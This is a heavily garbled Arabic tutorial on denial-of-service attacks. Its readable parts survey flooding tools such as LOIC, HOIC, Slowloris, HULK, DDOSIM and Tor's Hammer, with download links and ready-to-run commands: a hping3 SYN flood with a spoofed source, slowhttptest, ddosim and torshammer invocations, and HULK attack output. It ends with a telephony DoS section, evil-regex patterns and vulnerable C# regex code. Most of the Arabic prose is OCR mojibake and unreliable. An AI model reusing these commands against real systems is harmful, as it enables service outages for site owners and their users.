*bV SjUlJ! ^bl dul£ dii^ LOIC (jjixuj jjVl dta ttilli ^ j ^201 1 ^ J J m ^.\ j cAj J Jaxj V ^1%^ 

Igj^Vlui^ <JjA jC t &ju&H Jl ^j^aiill bA ^.jI .Ig^lklLaid IP jjjUc L. ,J£Ji> ^a jflJ V LOIC U*^ J 'U^ ^ 

4_^jJa!j 4JLujj lLuj (Jj^-<uj dulaj i LOIC J <L£jLab<J! ^llxJl ^.L^Jl ^j^^ J ^Lq 1^1> ^1 Jc ^jiajkll ^lilj 

"(Do Not use LOIC) LOIC V" IRC ^ 

uaau ^jjSjsu V J ^JJ^^ cH*^ f # V J ^jjjIj ^ ^jjiill jl £jj j> ^ ui JL LaJjP jA Hiv Gill in d ;Aiaj^Ld 

J^ Vl^kU LOIC .cS^ 31 c> ^ DOS f J Lubjl U^j blinks J^ 1 jj Js£! jA LOIC 

m 4±l3LA 'kc Jjja*J ,^^qj HTTP ^-jlA^ UDP 'TCP t° ^UJI (jljC-l (i^jia (j^ 



[LOIC screenshot: window title "Low Orbit Ion Cannon | U dun goofed"]

jlj j URL J^* 3 ^ IP Lffi ^ cJ^^ ^* t V^ll -li^j* 1 ij W . 4 ^h'^ll j Aj-g jjujjII J J ^dUjAl ^I^JjojI a1 j^juj (j-<^ j 

( TCP^ (J -0 ^ * J JJ o 6JJj£ dil Ala jLaJjU ^dUjAl ^ajL .4_JjJal JJSVI CjI^I^cVI Jc l^JJ <ilj£-aJj <JjC- J>JI ^a J?^^ L - J ^ J^^" JJJ3LJJ 

t> j-M 1 cj^j IMMA CHARGIN MAH LAZER ? j**JI HTTP 'UDP 

. jajjjaJI Jl *L<i^JI j £l<J *L<i jV j^*JI cialitjjl! 
jl (^1 Jj^jj jjj" ^I^IujU jj sbbU jU^JI liA ^joijj JcVl J "(IRC) J j^-^ j 

b j^J>.Vl J dbVL ^aall ^aJJj CljjjjVl (Jj jia (jC (J^r> }} A \ > *aJ a d j^J>.Vl (JJ^J j dlj dj jAl ^aUaj ^j-d ^> <^>J 

^j|j ^cxiljjJ jA j .^a j^(g\l SAjuj Cj^I j IaK "dlj dj jAl" ^\ j LA£ ^flalljj 4^JHa3I ^if^ J^-C^"^ f>?^ ^ ^1 (Jj jia ^jC <L^lxJl 

jxJl Jc 4_ijjjj^3Vl CjIa^JI ^1 jj! ^jjjjjujI ^.1 J 4^jLouJIj b \ j^J! J^-j (JJJ ^JIaII ^.aulj 

u &La CJjiLj tji^ fe4 rtfall Jp J-aju 

High Orbit Ion Cannon (HOIC) * 
j^l 'High Orbit Ion Cannon (HOIC) 'LOIC Jl ' jL^^l SljtS LOIC "L^j" c£jj 

J jLl I ^3 j^ (Jfljoil iljkj'V ^ j-« (J^C-U lA jl j3 Jc bj b laJLAI djUV jll J <Ja*jM djI jj L-fll^JjoaV a ^ laJLuji ^aJ LdAic <C jjoij ^ jJ^all 

HTTP POSTJ^ jj ^U-Vl j^j^l 4d> j2, J ia^ jjjki >V! ja HOIC J J ."Megaupload.com" 

.^al^kiajVI <1^uj aj^jjoj Jl ^ ^luaxl l j J ^jli-A GET requests j 
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AjflLiaj AjjojLojI ^1 j£I ls 1c jlaJ is^J *b*bial dAib j\ (jSCtlpts) ^J 1 ^-al^)Jl '"bOOSter" ^ibiat (j-a AlJlxi (j-a£j 

c> ^tjS ^^kiauJl ^joij booster scripts ^ l-i^t <j£Jj CjUii ^\ s j^U« lAS^jj V HOIC t> ^ 

^UlS L_l*_j^al HOIC <*-lb^Jfc J* 7- J bui J?S^ JJ^ ^ Ja^tt JJOIC ^ V w " j 4i^JjaixJl £3 1 ^<J| (jJjbc 

Cjl (JA jll Jc ^DDoS L - J ^^ A (J^-^V f^-*-^ plaJI J L>^H JjVI <J^ (j-a l^l^klujl ^Jjl HOIC J^ 3 ^ JJ .£^1 J 

.HOICc>l?J^ yr^ >-2B V o-^jSVl 




Hping3 *k 

c5 j^Vl CjIj^VI l \ ^ikU ±\ jaVl c> jjc. j (j j^Vl <l^ajall CjIc^U^j (joi^ij jjV) 'HOIC j LOIC J) <abiaVb 
'hping <sbVI ^ ^ s^lj .4jj«-SI <j^ < Lu^l l ^ Ion Cannons J ^j^j^' o-^i^ c_llolj <j^Lkj <DDoS iP^V 
ICMP echo (O^ Jl^jl c>» c^jlli jll l^j^I -uli tcilb .ping ^b^U 4_£bu> U ^ J) <axAjJ)!\ jJjVl obi j& 

J TCP a£ j*. t> * jV t^l^i^l Hping .ping ^ c^ajESII ^I^IujVI j& j ^ K 1 t> i J request 

.l^^kloij (Jj^h jjVI 4_ajUs C5 ic hping lJIjj V c ( Jjl^lll CjIj^II lP^xj ^liloj 

Application ^ Kali Linux -^Information Gathering ^ Live Host Identification -> Hping3 




root@kali:~# hping3 -S 192.168.1.105 -a 192.168.10.10 --flood
HPING 192.168.1.105 (eth0 192.168.1.105): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown



^illj _a jUaJI .^^SU (j-aUJ! IP jIjjc- tdli axj ^ SYN Flag ^ j^j flood £jj ^ -S J^p^ 

.flooding ^ ^I^IojI —flood jb^J^ ^ .^J 5 ^ c?^^ IP u' t^j^ 
.hping3 --help j^'"^ <cUla (j^jia £p> ^ ^aLk!! CjljLikjl ^-ia^ ^bjj ^

Slowloris *k 

http://ha.ckers.org/slowloris
"low and slow" t^*^ jSSVl ^ y\ c> ^axI3 lJU^V! ^ ^ straightforward brute-force flood <ab^V^ 
'Slowloris t ^-^^ ^ > ^^131 *L<»^J! (j>» (jLa^J! dal (*^^^ (j£-<uJI (j>» <J*^ t^l i^iLujVI <1^juj cjIj^I ^1 

(j-G (jbij^JI <JL^. ^5^* j '"RSnake" o^^a Cj^jjj l^Lb^j ^IS ^ill j <j^bij3l <xja3l <jj^alja <Jja ^ dm > j sl^l 

s gJJ ^ c^^JI ^ J) HTTP headers Jb- jj ^> c> HTTP request ^l^b ^UJl 

.<c jjAxJI L-jbHali ^ ^blsLill <c jjaij j^ta jjc. j^i 4^\-jja jA\ J ^^LiJI ciiVb^ajVl (j-« b ^1 b] .headers 
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m a( jSS JAnnl) ^Uaj Jaxj uLS 

http://ha.ckers.org/slowloris

Download: slowloris.pl or slowloris6.pl (IPv6 version) <ija JiA\ ^ t>j 4 ^ > ^ l 



Version: Slowloris is currently at version 0.7 - 06/17/2009 and 0.7.1 (IPv6 version) - 04/02/2013

Download: slowloris.pl or slowloris6.pl (IPv6 version)

Getting started: perldoc slowloris.pl or perldoc slowloris6.pl

Issues: For a complete list of issues look at the Perl documentation, which explains all of the things to think about when running this denial of service attack.



#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = "IGNORE";    # Ignore broken pipe errors

print <<EOTEXT;




La CjUjI^ <\ 4j3 ^cjouj j ^ > jj^^ A aaij slowloris.pl <*-ili t aL> ^jooj ^xi j A ^1 £>i& CjUjI^ a ^ja's ^cjouj ^ j£j 



i^Vl^ Jtla jjll jJjVI jk^ ^U3I jkJl ^jSj 



root@kali:~# cd /home/
root@kali:/home# ls
slowloris.pl
root@kali:/home# chmod +x slowloris.pl
root@kali:/home# ls
slowloris.pl
root@kali:/home# ./slowloris.pl



^l^i^Li 4j qA~A\ IP jic. ^yk. J^j^iJLi V jl ?J Si http://www.certifiedhacker.com ^Sj*II <-il.i$U .jjjj Uj| ^ jSijl 

:<^Vl£ host 



(./Slowloris) j-Vl U3S <> 0 VI P jfc 




root@kali:~# host www.certifiedhacker.com
www.certifiedhacker.com has address 202.75.54.101
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I^JVIS Slowloris J^a^l ^J^i^lj IP o'j^ £^ ^ 




ujjjU ^ jU£ GoAheadj Tomcat <dhttpd 'Apache Ja*2a-2 ^aaJ) ^Ij* ^ J** <ja^l ^ : 4jajal* 

CjUjj jl ^-iluaj uLUaj jjSjj Cjjfla Slowloris cr^ £-*L>^ <> 'Slowloris JJ^a ^ 

dii^ .4jsi^ JL^jI cjV jfcjijj* f v^nij ^1) Protocol-agnostic j J**^ ^ uj^ £^ ^ £^ :PyLoris 

.SOCKS jj^j TOR ^ .(JL^SVI bgj <<jl jSVl <~ cjVjSjjjjJI jliii 
.Go c> j nginx ^ Slowloris j* j :Goloris 

.Qt front end f^jj . Jj^j J^slt -u^i ^ <j'^j Slowloris ^ ^lill Jjtfll :QSlowloris 

.PHP c> I^Lxj^j Slowloris ja j :Unnamed PHP version 
.C++ ^ ^j&Aj \±± ^ j *<jM r <ASU* :SlowHTTPTest - 

ruby <^ Slow POST POC Slowloris :SlowlorisChecker - 

slowhttptest *t 
https://code.google.com/p/slowhttptest

CjI nala ^LiJlc. ^^Ic <J-a*J .(Jg-lflajll Alfla jlu^o ^^ic 4^^Jl ^ (jLa^pJl l— iLaaA (J^asu ^£L^J SAslx* obi ^ SlOWHTTPTeSt 

^ (jUaill (jlajC ^(^^-laJ CjLaaJb . jjAiij dlfl jjoj jjfLLJ ^aljVl ^lajuJj (<jjd£jjJ jl ^ - gala) CygWmj OSX 'U'^l^ 

-uii) Slow Read attack 'Slow HTTP POST 'Slowloris ^ jSSVl cjllnkil! 

c> Apache Range Header ? j ^1 cjVI^jVI L-il jil-I J!^k (TCP persist timer s ju ^JlJ 

cjUUI JUi£l c T JkL 4f j^| .HTTP JA^jjj J ^ c> a^u Slow HTTP POST j Slowloris o- 

^SLII jli tAjUll L pajkla JSjII jl£ lil jt ( jaJ HTTP s-^ jl£ lij .l^JU^ J\ Jja ^SLII Jja ^ J/qWi ^1 j UUj 

HTTP c> a-^^JI c> J j>^ti ^ ^ HTTP ^W 1 ^ J^jj 

$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ make install

( https://code.google.com/p/slowhttptest/w/list ) wiki -Mj c> £±*+j ^l^kl^VI iHal

.(man slowhttptest) ^ t*Ui j man c> 

iSlowloris ^ JUa 

./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://someserver/resources/index.html -x 24 -p 3

R U Dead Yet? (R.U.D.Y.) i- 

https://code.google.com/p/r-u-dead-yet j http://www.hybridsec.com/resource.html : j^-a^ll
^ j .RU Dead Yet? (R.U.D.Y.) ^ j Slowloris J ^ j i> u u j^ 1 ^ 

."Are You Dead Yet?" M 
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l*/efc> server 

c> HTTP POST submissions lWJI & f ^> c> i> RUDY 

Slowloris lU^ US <HTTP headers 



[Figure: a client that browses the website and keeps slow HTTP POST submissions open against the web server]

cjUIaxJ R.U.D.Y. jUil>VI (jAj time POST s^j^ c^f^ ^ cjUjIxJI ^Ij cjAj JL± (jjjia t^lli ^ 
cJ^ i> ^ jUI to*) ^UJ! ilij Jj V ^ill POST ^ jU^V! "Application threads" J^ 11 

R.U.D.Y f ^!>J! dVl^iVI t> ! ji3 ^VimMlj <POST HTTP ^ "rest" ^ jU^I 




URL J*^ "forms" JliiVt o& ^SIL Ujliti ^ jB ^Ij ^"interactive console" 4_iktB <^jta ^ Ja*j sbVl ai* 
AiUbVUj .POST f *bV Vl.ikU ij M^jd cr^ 1 "form filed" j "form" JS^ c& ?^*«W ^UJ! j 

djUjuoS jjJI ^c^i ^ jj 2 j^^^V^ aIq -( jjj£i3l L_aL <J^b Ajjj^Jall cjULlaII jjs jj ^ iiiiill sbVI ttilli 

t5 lc lUs ^j^^ ^ .-W^ uj^^ j jjSj j^jSlI CjUL ^l^kiujU session persistence jSOCKS 

\A LiaJ 1^. L-Jxj gall cJ*-?^ Ux» tA^JjoJl (j^flaJ AjIa^JI (j-d L_Lu»£3l £yz S- 5 ^)^ ^ US [(JjxjujJ ^aUaj ^1 4L_lJj3! ^a^Li. ^1 

:0^jJI ^^J^ R.U.D.Y. 

JLl» jj3I ^ ^Vl <jI^S J5Lk tillij "Interactive menu mode" aJc^UjII 

$ ./r-u-dead-yet.py URL 

.(.config) ^l^c-VI URL <^^Sj "Unattended configuration-based execution" ^i^VI ciL ^Ul ^ ijilill 

#RefRef * 

^^ic ^jijj jjVI <iUjj ^b) t#RefRef ^ Jalaj ^LojI ^^ic jjc. o^lcl SjjSUll CjI q\ 

"Injection attack" ^W^j ^illj ^Ij ^Uaj ^ ^^kl^JI SQL database g^jt ^ ^Jj^jJI t <T » ^ t JalSj ^Uii 
C5 lc U jb^j (jjjia c> ^-a^i ^^UJ a^^A\ j^J! ^ L-WilU j^l^il ^joij #RefRef 'SQL injection ^I^IujU 
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V #RefRef <HOIC J LOIC t> J\ lS*& ^ ^\ ^ jA\ c^Ukfll 

6L_flajJa Jallj Cjb j SQL f.V^"iJ ^SLll/^UJl jl£ liU .l^-a j^Jfc dj^iU jtjiM IjJ^ ^UJl JaULJ J^j ^ dj^Vl t> I JJjS b^C- L-lUaJJ 
(jauuj jjVI dulS tSbVI J^J^ -^c- ■ ^Uaiil t . Ujujjj l_a jjoj ^jJI j CjVVI (>g l£ 4a1aJI liltiA (jj^J ^— a jjuj 4ita 

^.1 jll jl^-aJI 20" 10 < ■ illaJJj taj-a {JS ^ ^laJ <U > oJ Jj^Jl ^^>^ ^Uakj! ( . UjujJ Lu» t^a! ^<J! t fltla a ^glc DjUlkU 

.aSjSj 42 jaII 4_yu ^ Sj^lS s^l j 3JI ^> a^Ij 17 ^ jl£ <(Pastebin ^) ci^j .#RefRef lU*J 

(J£judj jjAljj ^^^ic Aaijjj ^jj ^aJ O^J CjIsu jjj ^Jax a £a (J.J£ p.. * ' ^ ^ .4-lilLuix» 4_k^aix» Igiacaj Lu» (J^iJ 4jlL l_j jj£ a $RefRef 



Administrator: C:\Windows\system32\cmd.exe

$>perl ./refref.pl

== #RefRef ==

[*] Sintax : ./refref.pl

== #RefRef ==



ojlj C)\ c£*i V c^jlu^l lj* .(perl ./refref.pl Target_URL) j-l jVl jk- JMl <> jJl ^L-Vl f bii-VI 

f injected SQL commands J jjj ^^UJIj JU^jVI ^ ^i^j -oli #RefRef <^^? ^ j^? 

CTRL+C 



Administrator: C:\Windows\system32\cmd.exe - perl ./refref.pl http://




XOIC J- 

http://sourceforge.net/projects/xoic 

JjSjj jjjj t( »ikiab»Sl (Jj3 j> lilt tlP jljie ^ ? jLk (^1 ^ylc DOS f» >M> .DOS "W* <_5 oljl gjA XOIC 

a^Ij ^ ^jL <gV ^LOIC .Sj^S c ljj LOIC 6- c5jai XOIC J uj^Aj XOIC .^^i^l jbiLl ^ 



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normal DOS attack gH^' j j& j '■test mode ^-i <-«jj«-» 'J jVI JaUji ^Dtf ^ ^JU staV! t^lc. Jl>ij 

. TCP / HTTP / UDP / ICMP^j £- ^ c^l 2)05 atfacA; mode t^j > ^1 j >b ./node 

.DLR DoS j 8j 7 jj^j lS^*-*^^ ciaL 4 > ^> * ^ 1 ^ £3 j XOIC ^jj^ 3 ^ ^ ^ ^ ^ j s-yj^ 

HULK (HTTP Unbearable Load King) i- 

http://packetstormsecurity.com/files/112856/HULK-Http-Unbeara : j^-aJI

^^klaaj ^UJ f^*^ ^ j ^j* W^ 3 ^ ls^ DoS f lsj^ HULK 




Administrator@XPCL-F5291558C9 ~
$ cd /cygdrive/c/hulk/

Administrator@XPCL-F5291558C9 /cygdrive/c/hulk
$ ls
hulk.py

Administrator@XPCL-F5291558C9 /cygdrive/c/hulk
$ dir
hulk.py

Administrator@XPCL-F5291558C9 /cygdrive/c/hulk
$ python hulk.py http://192.168.3.111 safe
-- HULK Attack Started --
73 Requests Sent
76 Requests Sent
77 Requests Sent
78 Requests Sent
79 Requests Sent
80 Requests Sent
81 Requests Sent
82 Requests Sent
83 Requests Sent




DDOSIM - Layer 7 DDoS Simulator i- 

http://sourceforge.net/projects/ddosim : j^-a^ll 

C-LaaJb 4 a\ ikl^l ^jjj ;lg^juj| i^-JJ .(DoS) (j- 0 U^J^ C-lLi^A pbV 4_n«-^ L$J^ DDOSIM 

fiLl! lU* TCP cjVI^! jSj "Zombie" 5^ ."Zombie" o^^\ c> ^1 slSU^ J^U <> DDOS 

SbSn d^J jit g-^Ull 

- Simulates several zombies in attack
- Random IP addresses
- TCP-connection-based attacks
- Application-layer DDOS attacks
  - HTTP DDoS with valid requests
  - HTTP DDoS with invalid requests (similar to a DC++ attack)
  - SMTP DDoS
- TCP connection flood on random port

I^Jtill Jajl J\ djUJ td&AJ sbVl oiA & **\ 

http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/

.^U]L^ jj^ HTTP J^-jjj ^u^l y^. IP ojjU^ ^> TCP ^Vl^il 10 

$ ./ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTP_INVALID -i eth0

:EHLO J^j]j SMTP ^ J\ 10.4.4.0 ^ t> CjVU^I o-^b 
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$./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -cO -r SMTP_EHLO -i ethO 

.<^JL^a HTTP cjLIla ^JUt CjVI^jVI ^jni Jol jjoj J CjVU^jI 

$ ./ddosim -d 192.168.1.2 -p 80 -c 0 -w 0 -t 10 -r HTTP_VALID -i eth0

Tor's Hammer *k 

http://packetstormsecurity.com/files/98831 : j^-a^ll
sj^ sbVl ^ .jj^U J slow POST sbi yr*j ■ jW^VI t> csj^ DoS *bV sbl ^ Tor's Hammer 

. jljj J IIS 



Slow POST DoS Testing Tool
entropy [at] phiral.net
Anonymized via Tor
We are Legion.

./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help
Eg. ./torshammer.py -t 192.168.1.100 -r 256

anonymous@anonymous:~/ddos-tools/torshammer$



OWASP HTTP Post Tool (layer 7 DDOS) *t 

p j^Jfc .Ua ^liJl L5 lc j^IS tiL (j-aUJl ^JJjll ^La> jl£ tit La J&aal] aLVt ^1 ikU aJ .DOS V"^ l£ ^ 

.dujjjVI <^ J& £fl ^ ^Ja DOS iiiiil ^■su.n jt 1 > >»jt t^liJJ laia (jjjJ .V jl DOS 



[OWASP HTTP POST Tool screenshot: "HTTP attack (slow headers and slow POST attack)". Test type and destination: Attack type = Slow POST, URL = http://www.proactiverisk.com. General parameters: Connections, Connection rate, Timeout (s), User agent (Random / Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)), Diagnostics. Attack-specific parameters: Content length, POST field (Random), Randomise payload. Quit.]

https://cloud.mail.ru/public/10deb4151ce4/HttpDosTool3.6.zip

DAVOSET i- 

http://packetstormsecurity.com/files/123084/DAVOSET-1.1.3.html
Jl cookies ^1 sbVl ^ <> di^Vl jt^Vt ^Ubt ^ j .DDOS ^'j^V csj^ sbi ^ DAVOSET 

.Packetstormsecurity c> DAVOSET A'&«\ mS j j^Vt cj! JjJI qa ^jaJI ^ 

GoldenEye HTTP Denial of Service Tool *t 

http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Too : j^iJI 
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Ljaj! ^Ull jSl j <DOS uj^W 6 j^j^ p 2 ^ j DOS f pt^V c5 GoldenEye 

DoSHTTP J- 

http://www.socketsoft.net 

b jj^j jlmJ sbtS HTTP Flood Denial of Service (DoS) *bV ^A* e I^V! <V ^-j ^ DoSHTTP 
o^ij *bVl ^jj "Port Designation" iiU-ll .HTTP Redirection 'URL Verification lUAj DoSHTTP 

.jjjISSII ^) 

^1 j c^j ^ DoSHTTP u^j .*Jl*ill HTTP cjUl^a iiiil ji* "sockets" ^ DoSHTTP 

aSliA ^LkJL <j^aLaJI AjIa^JI ~ j/ a *J s^j^ s.bl ^ CjU» jlx-<JI Li^. jl jj^i ^-1^ a AcLaaj (jl (j^j DoSHTTP 

.C-aLiai ^^>jl jjjiaj j CjLg jIslaII ujj m * lM* DoSHTTP j^j^ ^ . t — ^j-^V^ 

.HTTP Flood Denial of Service (DoS) *bV jU^I sliS e I^VI <V - 
. JUi HTTP cjULjaja *bV jl* "sockets" - 

.URL [http://host:port/] J^b lJ^JI iii* Qi^h 
.(^jblkl) LAits cjUg»^t jj sicV HTTP ^ SjIo] - 
.^luia^ll jjjla^l a!ac)j pbVl 4j5Ij* lU^ 

.User Agent header J 

.CjblAcVI ( ; ilia j "sockets" (juj^l L_flJ^su ^.^klLoi*!! ^jjj 

jj) (jjjU*] numeric addressing 

.dlljLliJl ^J^> S^lcjj L-flA^J! (jjjUc q,^J 

jUI liVL-ttl o- 15 '000 f^ij oVl - 



[DoSHTTP screenshot: "DoSHTTP - Socketsoft.net [Professional Edition]", HTTP Flood Denial of Service (DoS) Testing Tool. Target URL = http://www.yourcompanywebserver.com/; User Agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727); Sockets = 1000; Requests = Continuous; buttons "Verify URL" and "Start Flood"; status "Ready"; http://socketsoft.net/]



Sprut *t 









[Sprut screenshot: TCP denial-of-service tool with target, thread count, Stop button and status line; "Coded by Yarix"]
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PHP Dos/DDoS Script (Dos Attack Tool) i- 

^4^^JI ^jUi^JIJ (jjjj^ A'sb .liiiil ^lq^^LuiaI] ^■..(u.hj PHP script j& ^—^o^-^ 1^ 



[PHP DoS script screenshot: "Your IP: ... (Don't DoS yourself nub!)", target/port/time fields, "Start the Attack" button, "After initiating the DoS attack, please wait while the Browser loads"; second panel: traffic at victim machine]




Janidos



Supernova DoS



Telephony Denial-of-Service 



jjc j\ ciuj±i)!\ jic* 4jj jj^all CjlibL^xJ! J^j^)1 <Ljuj j VoIP j> Voice over IP (^j^V^ ^j^j-^ jj^) ^j-^V^ (J^-^ ^— 1 

^^kjjoaj j <£djuaj Ijjjuj ^jJj^aid ^j-^LijjjVl (j* cs-^-^j .Internet Protocol ^yMI (j^* ^^"^ c^i 

,j|,JC.| <J^-^ L>* ^^A^ 4_ijflj3l aifc ^!>JaJ ual ^aJ _4 jfflti £>,JA ^I^JjojU UajUfc I jJ,jL^JJ ^jl (ClljjjjVl) (IP) ^—^J-^V^ <J 

4JL^V) cjUakLAJI <> f>£ telephony denial-of-service (TDoS) jfrk ^ <<jAj>Ai <^UWI CjUL^I ISSj 

oil 

^ijj^xjj J jL^jS .(Jl j>*VI l!^ ( : <JJa-jJa3l Au ni <jLaaj| j i laJ > n jll j\ A-i^jJallj (j^aLkJl L_fljj^xJl <JL^jU £OLk-<Jl ^aUa 
Lui jll CjUJI£-<JI (J-g L_flWl 4_i^jJa3l L_flj*l& Ja j^->^ Jjl jC.] ^aJJ Clll^ <J-*^J ^-^J (jAaJill - *aJ1 J <JL^jV1 

cjUUIjI ^jaa 2002 ^ ^ J^V^ c^ 5 ^ uj^ c> u' Telephony denial-of-service 

^ajj (Jjj JJoUi tilL C Vil^l j CjVIj^jI ^ ^njujLjjoJi ^a jj^aJl (jijC-V A-ifljl^Jl Cj^Ij^jVI du^aJLajl L— Ll^ 6 jJ.ulJ.rtlA jJJ ^ jJjuoll 

.CjUUjjV! 

^gluaVl jL^ajVI j-ft dlla (Ajj^JI <Ja. jJl dili 4_a3jlgJl CjUJIUIj CjUJUJI Jld) <JfljlgJl dlLLjaJl ^ U JJC^ ^ ( flllkj TDoS 
,AjjUallj <JJJJjj3l ^1 jjoj 4_iflj*l^Jl dil rtlKrtll (jUalojl jl ^1 J^-j <JJajJa3l ^aJJ U^J 66jj£l<Jl AjIVI CjUJI^xJI £a Ja jiaaJI (Jlsuail (j^J 

.fax loop transmission J black faxj SMS flooding *ht ^1*^ c> j 
JjILj 4-4±aJ) ^jSj ^ill DDoS for hire c> jt caller ID spoofing 3-*^ jij* ^> dJL ^LSJI 

.JLaJI ^ 
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"Unintentional Denial-of-Service" Sj^ai* jjiil 4^±aJI ^> jUjaJI ^UaA 



^jS (J^ j-* Aa*^* ^ L ; ^udJ (JJdJ I^A J 4<Ja3lII jC L_fl3 jJ jl ^JaLLull CljjjjVI <£jjai ^glc j>» jj^J <^ill AJLaJl t *° - I^A 

dlli dljjljVl (^^ic £2 Ajc- i^v^J jl j£-aJ lifc ,<lnxjai ^^.ILJl (JjI^JI ^^jVI < ; UjuoJ 4JaLaUJ j£3 j olj^VI (j-a ^ jl 

CjjixJalixJ! jj A ^** Ui '^l Cy* ^ jl 4 a^jUllj .AjjU^VI 4_k^aa3l j^» £ '(JllxJl (J^f^J CS"^ -^^J A£jUj1aj uj 

jjjUII (jjaij IgJ 11a j tAiilS dllcLui jjjJaC. ^ -^1 J^l 1^ JjjS ji^U duUi — (JjjUII j-G uVVI dllft c£^lj (^jujLujVI ^^ic- 

. jjALuL&II (JjS j>» Jajlj Jj^J ^JJ LaAjc Ij laall ^^^-Sc j£Jj 6<jaiij j&VIPDoS J -L^J^ (* ci^ j-* <— fl^laixJl £3 ^^ic 
_dxJa^J jl UaUj IgJ Cj^. jlijJj Ja. J*. (JLg £§1 jli 6 2009 UJ 1 >1< ^ C-J^^ ^ jJ La^jc 

\ g i£ (j-G jj jlj Netgear j D-Link j^ <J^ jl L — ^ ^ j > * 4-^-i^JI < cjLa^a ^Lau] U^l 1 g a\ jj jl j3I s 

.4.^1 ji^Jl A j^Jl jl JjLuJI £j jjf ^2 jjiall J jjall ^ I jjA NTP ^1 (jl jc-j c> NTP 

URL ^'^C (Jll<Jl cJjJjuj c>5 lc ;^j^.Vl ^^Ic-VI (JjIjujj (Jjjia (jc Uiajl JjUui L jjc. ^jc t4^^Jl ^jUi^pJl ^^^j ^jl (j^J 

(j-* W^ 1 ^ L>^ '-^^^^ *^ JJ 1 ^^ ^^J^ cJ^-^- } J» lJ^ J^- (j- 0 ^*^»1J^-S pJJ (jlS lili .^jjjjilill ^^^ic 

Universal Tube & Rollform Equipment ^> ^2006 ^ 6 ^ cJ^ JSVl ^ ^ ^jjlil! cjI^Ij^VI iUj! ^ 

.^^jjII jjUail! (j^ajc ^ jlabd ^ijl JUJI ^ ^j^JI ciiflfljj ttdli 4 a^jjj j .utube.com 6a£jjoJI URL 

crowdsourcing service J^^^ dilLl 'Malaysia Airlines Flight 370 ^jjUJI dj^a jl axj ^2014 ^ u^j^ 



Denial-of-Service Level II 



DDoS f -W^ f ^ yr^ ^i>«ti ^jSI ^la^ll <JI (jiUaj t t iu>m jl DoS L2 f 

jj^ jx» jilj 4^ ja^JI jo UUj dij jjjVI Jj^a ^aiLuj (^Vl ciljLJI ^jj ^ a^Ixj liAj) IP header modification J 




Regular expression Denial of Service - ReDoS 




djllnki fkx* jl Jii^j ^ill ^^kJI j^ jUj^JI ja Regular expression Denial of Service (ReDoS) 
j£*j .(Cj^kAxJI jjj£ tiUdj AiixiLJI) ^j^Jj JaxJI < . ujujj ^^jII 4_LuAi3! ^LiajVI ^l J^ 3 ^ ^ Regular Expression 

.taa. <Ljla 6 jjal Ji«j3l ^ j^ j c5 jj^I CjVUJI ^ J j^^l Regular Expression ^I^IujU jJ3 t ju > nj jl ^1^11 

Liufl j]| 4- 

djU jj'VI j "regular expression" AjikiJ! jjjUj3I ^v^n <jjuj j^JI ^31^ ^ 
t^Jl...jl jjauo ( jJLd L-±auuJ jl ^i^ajll jo ^^Uloj^U ^jjIIaII j] ^^kioij ^ij j^j V jl aSLLJ! ^jjaj JVl ^Ijj^all " automaton" 
is'^ 1^ CjI^.VI (JjuAjujj j djjlj jjc. ^JjoiLoajlli CjI^VI Cj^LiAjujj L_a^llkl ^.jj j^3 j j^*-« (JjuAjolL CjI^.VI j-« ^.jc UjJ jj^ 

^5jjjjJa3l j-d (jaJ ^UlU t^Uaill I^J (j^aLkjl CjLg jjVI 1 ^-llc L_fljxJJ ^^jll 4jl13I j CjULud^Jl jA dlLa jlx-<Jl A^J^. ^^ic jl CjLg jIslaII ^^ic 
L-jL ^j\_£L^.\ j^-<» (Jj ^jL^Jl L-jL II ^jl_£L^.\ Lftjb ^jiajjixJl jxi ^jjjJ L_flljj^U 4iUaJl Jl^k^l Asu djx» (JjoiLanl! (jjoiij j^*JI 

,^l1jL<» jjVI jjoVi^ ^ jjc-jij L_jlAi3l j£-aj ^UlUj U3 <jjaii3lj jU3 jiLz qSIAj^*!] jja jlill 
. "automaton" <*— iLa jjVI (J^^ j^ a °jj ^ 1^ ^ IjIj jl ajjj j^j ^-?^^>^^ * ^ 

Evil Regexes Ua^j U ^ 
.ajUxj c^jjua ^1 dj^LkAJU j^ilj ^1 ^ evil cr^^ " Reg ular Expression" regex ^ 

VVli Evil Regexes *&*S 
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(a+)+ 

([a-zA-Z]+)* 

(alaa)+ 

(ala?)+ 

G*a){x} I for x > 10 

ls j1\ ^regular expression" AjiiaiJl jjjUjII ^.v^im* cjULuLjll <jc dxaJ] e5b.i sjjSlall 5ij*-»3l ^v^imj ( -»->\g «ll 
JLkjL 1 g i oij Regexes j-^ l^j V^j .^>Llaill (JJa*j < _ t_i ^ (^jll j < ** ^ j ■ <-> diili..i<Jl JLjjjIj «Evil Regexes 

_ jlaaJ] <Ajajc j»Uaill <J*^j 'Evil Regexes u**. ( -.->< ^ <^\t t^v^imall 




[Figure: Web Browser -> IDS/IPS -> IIS / Web Application -> DataBase]


.Evil Regexes ^ ^ gr^ '"regular expression" 3jtt*i*l l j^Uill ^Ua WEB CjULL aLL J£ ^ 

6 (WAF)^J ^lllaJ 4-^--^ (J^J '(<J J"^ all jlfraJI ^glc Uiajl (J^^J J' jJJ^ j^-^- c^-^-) S-^J^ ^Lq (JlaxJ ^jl 

_L_JJj (J^lflaJ Aa. j lij JUaII J^f^ 

using System.Text.RegularExpressions;
using System.Windows.Forms;

// User-controlled text is compiled straight into a regular expression and
// run against a second user-controlled string: the same user supplies both
// the evil regex and the input that makes it backtrack.
String userName = textBox1.Text;
String password = textBox2.Text;
Regex testPassword = new Regex(userName);
Match match = testPassword.Match(password);
if (match.Success)
{
    MessageBox.Show("Do not include name in password.");
}
